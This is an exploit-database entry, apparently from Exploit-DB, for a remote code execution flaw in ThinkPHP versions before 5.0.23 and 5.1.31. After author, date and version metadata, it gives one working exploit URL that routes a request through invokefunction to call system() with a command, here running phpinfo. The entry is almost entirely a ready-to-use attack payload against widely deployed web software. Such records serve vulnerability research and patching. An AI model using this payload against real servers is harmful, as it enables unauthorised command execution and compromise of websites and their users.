ThinkPHP 5.0.23/5.1.31 - Remote Code Execution
Author: VulnSpy
type: webapps
platform: php
port: 80.0
date_added: 2018-12-11
date_updated: 2018-12-12
verified: 0
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comframework-5.1.30.tar.gz
# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
# Date: 2018-12-11
# Exploit Author: VulnSpy
# Vendor Homepage: https://thinkphp.cn
# Software Link: https://github.com/top-think/framework/
# Version: v5.x below v5.0.23,v5.1.31
# CVE: N/A
# Exploit
http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'